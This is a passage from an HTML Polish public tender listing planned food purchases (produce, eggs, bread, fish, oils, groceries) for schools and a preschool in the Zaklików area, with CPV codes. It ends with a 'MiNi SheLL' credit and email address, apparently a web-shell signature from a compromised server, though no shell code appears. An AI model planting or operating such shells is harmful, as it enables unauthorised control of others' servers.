1	Cytryny	kg	30
2	Banany	kg	120
3	Jabłka	kg	120
4	Mandarynka	kg	120
5	Pomarańcze	kg	40
6	Wiśnie	kg	100
7	Truskawki	kg	80
8	Sałata 	szt.	160
9	Sałata lodowa	szt.	100
10	Kapusta biała	kg	120
11	Kapusta kiszona	kg	120
12	Kapusta pekińska	szt.	40
13	Kalafior	szt.	40
14	Koperek pęczek	szt.	100
15	Pietruszka	kg	100
16	Pietruszka natka (pęczek)	szt.	100
17	Ogórek świeży	kg	100
18	Ogórki kiszone	kg	150
19	Burak ćwikłowy	kg	200
20	Cebula	kg	80
21	Marchew	kg	300
22	Pomidor	kg	30
23	Seler	kg	80
24	Por	kg	20
25	Rzodkiewka pęczek	szt.	80
26	Szczypiorek pęczek	szt.	80
27	Ziemniaki	kg	360
28	Groch biały 0,5 kg	szt.	60
29	Porzeczka czarna	kg	100
30	Jagody/borówka amerykańska	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Cześć IV - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zespół Szkół Ogólnokształcących w Zaklikowie
Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Jajka kl. L	szt.	3700

2.	Zespół Szkół w Zdziechowicach
Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Jajka kl. A	kg	40

3. Publiczne Przedszkole w Zaklikowie
Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupy przed 10 m-cy
1	Jajka M pakowane po 10 szt. kl.L	Opakowanie	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zespół Szkół Ogólnokształcących w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupy przed 10 m-cy
1	Brukselka	kg	20
2	Kalafior	kg	30
3	Szparaga	kg	20
4	Brokuł	kg	20
5	Mieszanka warzywna	kg	40
6	Mieszanka owoców	kg	350


2.	Zespół Szkół w Zdziechowicach

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Kalafior 2,5 kg	kg	82,5
2	Fasolka szparagowa 5kg	kg	10
3	Brokuły 400g	kg	5,6
4	Bukiet jarzyn 500g	kg	11,8
5	Owoce mrożone 2,5 kg	kg	122,4
6	Frytki mrożone 2,5 kg	kg	102,5


3. Publiczne Przedszkole w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Kalafior 400g	szt.	100
2	Brokuły 400g	szt.	160
3	Brukselka 400g	szt.	80
4	Fasolka szparagowa 2 kg	kg	90
5	Groszek zielony 400g	szt.	180
6	Włoszczyzna słupki 2,5 kg	kg	400
7	Truskawki 2,5 kg	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI - pieczywo, wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zespół Szkół Ogólnokształcących w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Chleb duży 1,1 kg	szt.	330
2	Bułka zwykła 0,05 kg	szt.	720
3	Pączek 0,07 kg	szt.	180
4	Bułka tarta 0,5 kg	szt.	240

2.	Zespół Szkół w Zdziechowicach

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Chleb krojony 0,6kg	szt.	312
2	Chleb razowy krojony 0,5 kg	szt.	49
3	Bułka zwykła 50g	szt.	728
4	Bułka piaskowa 300g	szt.	22
5	Bułka zapiekanka 200g	szt.	64
6	Bułka drożdżówka 80g	szt.	284
7	Bułka mini maślana 50g	szt.	286
8	Bułka oponka drożdżowa 80g	szt.	244
9	Bułka tarta 0,5 kg	szt.	53
10	Rogale pączkowe 100g	szt.	264
11	Pączki 70g	szt.	304
12	Eklerka z budyniem 330g	szt.	142








3. Publiczne Przedszkole w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Chleb zwykły krojony 600g	szt.	500
2	Chleb razowy 400g	szt.	1200
3	Chleb wielozbożowy 600g	szt.	600
4	Bułka razowa 50g	szt.	2000
5	Bułka maślana 100g	szt.	1200
6	Bułka zwykła 50g	szt.	2000
7	Rogal maślany 100g	szt.	1200
8	Gniazdko serowe	szt.	400
9	Placek drożdżowy z serem 400g	szt.	100
10	Placek drożdżowy z marmoladą 400g	szt.	50
11	Rogal pączkowy 100g	szt.	500
12	Bułka tarta 0,5 kg	szt.	160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII - ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zespół Szkół Ogólnokształcących w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Filet z Tilapii mrożony	kg	120
2	Filet z Miruny mrożony	kg	80


2.	Zespół Szkół w Zdziechowicach

Lp.	Opis artykułu szczegółowy -skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Filet z Tilapii 10kg	kg	62
2	Filet z Miruny 10kg	kg	60
3	Paluszki rybne 6kg	kg	44
4	Sardynki w pomidorach 240g	szt.	6
5	Pasta z makreli 120g	szt.	5
6	Ryby wędzone luzem	kg	2

3. Publiczne Przedszkole w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Filet z tilapii	kg	80
2	Filet z soli	kg	80
3	Filet z mintaja	kg	80
4	Filet z dorsza	kg	100
5	Makrela wędzona	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część VIII - oleje i tłuszcze jadalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zespół Szkół Ogólnokształcących w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Olej rzepakowy z pierwszego tłoczenia	L	100
2	Margaryna 80% tłuszczu do smażenia 250g	szt.	140
3	Smalec	kg	200


2.	Zespół Szkół w Zdziechowicach

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Olej uniwersalny Olmaj 3L	Szt.	46
2	Oliwa z oliwek Basso 500 ml	szt.	12
3	Margaryna do smarowania 500g	szt.	69
4	Margaryna twarda 250g	Szt.	149
5	Smalec wp.200g	Szt.	84

3.	Publiczne Przedszkole w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Olej słonecznikowy 1L	Szt.	30
2	Olej rzepakowy Kujawski uniwersalny 1L	Szt.	120
3	Margaryna do pieczenia Palma 250g	Szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część IX - wyroby garmażeryjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zespół Szkół Ogólnokształcących w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Pierogi ruskie	kg	200
2	Pierogi z kapustą	kg	200

2.	Zespół Szkół w Zdziechowicach

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Pierogi z serem(luz)	kg	33,5
2	Pierogi z płucek (luz)	kg	13,8
3	Pierogi ruskie (luz)	kg	46,4
4	Kopytka (luz)	kg	81,8
5	Naleśniki z serem (luz)	kg	22,8
6	Krokiety z mięsem i kapustą	kg	21,8
7	Uszka z grzybami 400g	kg	3

3.	Publiczne Przedszkole w Zaklikowie

Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Pierogi z serem	kg	200
2	Pierogi ruskie	kg	200
3	Naleśniki z serem	kg	200
4	Kluski śląskie	kg	200
5	Kopytka	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.40.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część X - różne artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zespół Szkół Ogólnokształcących w Zaklikowie
Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przed 10 m-cy
1	Cukier	kg	300
2	Mąka ziemniaczana 500g	Szt.	40
3	Mąka pszenna	kg	200
4	Makaron świderki	kg	350
5	Herbata rozpuszczalna owocowa 300g	Szt.	450
6	Przyprawa do zup, potraw mięsnych i ryb 200g	Szt.	350
7	Przyprawa do kurczaka 30g	Szt.	40
8	Przyprawa do zup w płynie 960g	Szt.	10
9	Pieprz czarny mielony 20g	Szt.	220
10	Pieprz ziołowy mielony 20g	Szt.	220
11	Ziele angielskie 12g	Szt.	40
12	Liść laurowy 6g	Szt.	40
13	Papryka słodka mielona 16g	Szt..	30
14	Papryka mielona ostra 20g	Szt.	20
15	Rosołki drobiowe op.12 kostek	Szt.	100
16	Kwasek cytrynowy 20g	Szt.	50
17	Sos grzybowy 30g	Szt.	150
18	Sos boloński 46g	Szt.	250
19	Sos pieczeniowy ciemny 30g	Szt.	230
20	Sos sałatkowy 9g	Szt.	110
21	Zupa barszcz biały 66g	Szt.	30
22	Zupa grzybowa 48g	Szt.	30
23	Cukier waniliowy 15g	Szt.	10
24	Koper suszony 6g	Szt.	40
25	Rosołek grzybowy op.6kostek	Szt.	30
26	Kasza gryczana	kg	110
27	Kasza jęczmienna	kg	80
28	Ryż	kg	30
29	Sól	kg	130
30	Majeranek 6g	Szt.	80
31	Majonez 500ml	Szt.	100
32	Ocet 0,5l	Szt.	4
33	Chrzan 180g	Szt.	35
34	Barszcz biały 0,5l	Szt.	20
35	Sałatka konserwowa Babuni 900ml	Szt.	120
36	Syrop do napojów o smaku malinowym ekstrakt min 66,0 430ml	Szt.	80
37	Galaretka owocowa 79g	Szt.	60
38	Soczek owocowy 400ml	Szt.	400
39	Groszek konserwowy 400g	Szt.	40
40	Kukurydza konserwowa 400g	Szt.	30
41	Koncentrat pomidorowy 30% 900ml	Szt.	100
42	Ogórki konserwowe 900ml	Szt.	230
43	Marmolada wieloowocowa 700ml	Szt.	12
44	Dżem 300g	Szt.	10
45	Wafelek w czekoladzie 52g	Szt.	800

2.	Zespół Szkół w Zdziechowicach
Lp.	Opis artykułu szczegółowy - skład,
Opakowanie 	Jednostka miary	Ilość planowanego zakupu przed 10m-cy
1	Przyprawa do żeberek Prymat 20g	Szt.	18
2	Przyprawa w płynie Magii 1000ml	Szt.	12
3	Przyprawa delikat do mięs Knorr 75g	Szt.	56
4	Przyprawa kucharek Prymat 1000g	Szt.	11
5	Przyprawa do mięsa mielonego Prymat 20g	Szt.	36
6	Liście laurowe Asta 10g	Szt.	18
7	Ziele angielskie Asta 10g	Szt.	18
8	Pieprz prawdziwy Asta 20g	Szt.	45
9	Pieprz ziołowy Asta 20g	Szt.	45
10	Majeranek Asta 10g	Szt.	120
11	Rosołek drobiowy Winiary 120g	Szt.	20
12	Kostka mięsno-drob. Winiary 180g	Szt.	40
13	Kwasek cytrynowy Delekta 200g	Szt.	96
14	Ketchup łagodny Kotlin 600g	Szt.	18
15	Majonez Fruktus 900ml	Szt.	8
16	Groszek konserwowy puszka 400g	Szt.	58
17	Kukurydza konserwowa puszka 200g	Szt.	17
18	Mąka ziemniaczana Kupiec 0,5kg	kg	12
19	Mąka typ550 pozn. Lubella 1kg	kg	139
20	Makaron łazanki nr 46 250g	Szt.	45
21	Makaron świderki 4 jajeczny nr 19 500g	Szt.	82
22	Makaron spaghetti Labella nr 4 500g	Szt.	60
23	Makaron nitki swojski 4-jajeczny 250g	Szt.	24
24	Sos pieczarkowy Winiary 70g	Szt.	78
25	Sos boloński Winiary 46g	Szt.	195
26	Sos pieczeniowy ciemny Winiary 30g	Szt.	24
27	Galaretka owocowa Delekta 100g	Szt.	140
28	Syrop Cymes-butelka 500ml	Szt.	162
29	Płatki ryżowe Kupiec 250g	Szt.	10
30	Krem Nutella do smarowania 250g	Szt.	18
31	Herbatniki 50g	Szt.	30
32	Plusie maślane 300g	Szt.	20
33	Wafelek Princepolo Olza 52g	Szt.	280
34	Czekolada nadziewana Wedel 100g	Szt.	90
35	Płatki Nestcweek 500g	Szt.	29
36	Płatki mlekołaki Lubella 500g	Szt.	18
37	Dżem niskosłodzony słoik 250g	Szt.	36
38	Papryka konserwowa słoik 720ml	Szt.	36
39	Kasza jęczmienna (saszetki )400g	kg	18
40	Ryż kartonik Impak (saszetki) 400g	Szt.	124
41	Kasza manna zwykła 500g	kg	6
42	Kasza gryczana kartonik Janexs 400g	Szt.	102
43	Sól jodowana EDO 1kg	kg	82
44	Ocet jabłkowy butelka Knorr 250g	Szt.	16
45	Cukier biały królewski 1kg	kg	302
46	Cukier puder Kupiec 500g	kg	4
47	Miód pszczeli Bartnik 20g	Szt.	4
48	Kawa zbożowa Inka rozpuszczalna 60g	Szt.	4
49	Herbata saszetki 100torebek Saga	Szt.	6
50	Czosnek kostka Knorr 35g	Szt.	126
51	Sos sałatkowy Knorr 9g	Szt.	186
52	Koncentrat pomidorowy Kotlin 200g	Szt.	134
53	Cukier waniliowy Delecta 32g	Szt.	114
54	Kakao rozpuszczalne Nestle 300g	Szt.	18
55	Kisiel różne smaki Delecta 64g	Szt.	26
56	Budyń różne smaki Delecta 64g	Szt.	27
57	Chrzan tarty Polonaisse 180g	Szt.	14

3. Publiczne Przedszkole w Zaklikowie
Lp.	Opis artykułu szczegółowy - skład, opakowanie	Jednostka miary	Ilość planowanego zakupu przez 10 m-cy
1	Mąka poznańska typ 500 1kg	kg	100
2	Mąka poznańska typ 450 1kg	kg	50
3	Mąka ziemniaczana 0,5kg	kg	40
4	Makaron nitki gat.1 ;500g Lubella	Szt.	150
5	Makaron świderki gat.1; 500g Lubella	Szt.	450
6	Makaron łazanki gat.1; 500g Lubella	Szt.	160
7	Makaron kolanka 500g Lubella	Szt.	400
8	Biszkopty okrągłe Petitki 120g	Szt.	80
9	Biszkopcik z nadzieniem MiśLubiś 30g	Szt.	200
10	Barszcz biały w proszku 66g Winiary	Szt.	300
11	Majeranek 6g  Prymat	Szt.	40
12	Przyprawa uniwersalna w proszku do zup 1kg Kucharek	Szt.	15
13	Pieprz czarny mielony Prymat 15g	Szt.	40
14	Pieprz ziołowy Prymat 15g	Szt.	150
15	Ziele angielskie w całości Prymat 12g	Szt.	50
16	Przyprawa do ryb Prymat 20g	Szt.	50
17	Przyprawa do fasoli Prymat 20g	Szt.	30
18	Przyprawa do kurczaka Prymat 70g	Szt.	40
19	Przyprawa do mięsa mielonego Prymat 20g	Szt.	30
20	Przyprawa do zup w płynie Winiary 960g	Szt.	40
21	Czosnek granulowany Prymat 20g	Szt.	80
22	Rosołek wołowy-kostka 6szt 60g	Szt.	20
23	Sos pieczeniowy ciemny w proszku Winiary 30g	Szt.	200
24	Sos do spaghetti w proszku Winiary 46g	Szt.	200
25	Sos pomidorowy w proszku Winiary 36g	Szt.	200
26	Cynamon 20g	Szt.	20
27	Kwasek cytrynowy 20g	Szt.	30
28	Liść laurowy Prymat 5g	Szt.	50
29	Cukier 1kg	kg	200
30	Cukier puder 0,5kg	Szt.	20
31	Cukier waniliowy 15g	Szt.	50
32	Koncentrat pomidorowy Kotlin 1L	Szt.	25
33	Koncentrat buraczany Krakus 300ml	Szt.	40
34	Ketchup pikantny Kotlin 380ml	Szt.	20
35	Ketchup łagodny Kotlin 380ml	Szt.	80
36	Sok marchwiowo-jabłkowy 900ml-plastik Kubuś	Szt.	250
37	Sok Cymes truskawka-butelka 430ml	Szt.	200
38	Sok Cymes malina-butelka 430ml	Szt.	200
39	Sok Cymes wiśnia-butelka 430ml	Szt.	400
40	Dżem truskawkowy słoik 280g-Tarczyn	Szt.	100
41	Groszek konserwowy puszka 400g Vernet	Szt.	90
42	Kukurydza puszka 400g Vernet	Szt.	60
43	Galaretka w proszku 75g Delecta	Szt.	600
44	Kisiel 58g Delecta	Szt.	200
45	Budyń 64g Delecta	Szt.	100
46	Herbata owocowa/ saszetka 20szt	Szt.	80
47	Herbata czarna Lipton-saszetka 100szt	Szt.	15
48	Kawa zbożowa rozpuszczalna Inka 200g	Szt.	80
49	Kakao ciemne Decomoreno 80g	Szt.	25
50	Sól 1kg	Szt.	80
51	Jabłka prażone słoik 1l	Szt.	250
52	Chrzan słoik Fructus 270g	Szt.	80
53	Majonez dekoracyjny Winiary 700ml	Szt.	80
54	Miód naturalny 400g	Szt.	20
55	Kasza gryczana Kraw-Pak 500g	Szt.	160
56	Kasza jęczmienna Kraw-Pak 500g	Szt.	200
57	Kasza jaglana 500g	Szt.	100
58	Ryż biały Kupiec 1kg	Szt.	200
59	Płatki kukurydziane czekoladowe 250g	Szt.	210
60	Płatki ryżowe błyskawiczne Kupiec 180g	Szt.	160
61	Sok jabłkowy w kartonie 1l Tymbark	Szt.	120
62	Sok pomarańczowy w kartonie 1l Hortex	Szt.	250
63	Sok wieloowocowy w kartonie 1l Tymbark	Szt.	250
64	Biszkopty okrągłe z galaretką 147g Delicje	Szt.	100
65	Czekoladki mleczne Kinder op.8szt	opakowanie	200
66	Krem czekoladowy Nutella 230g	Szt.	100
67	Woda mineralna smakowa 1,5l	Szt.	120
68	Pasztet firmowy z drobiu Indykpol 131g	Szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com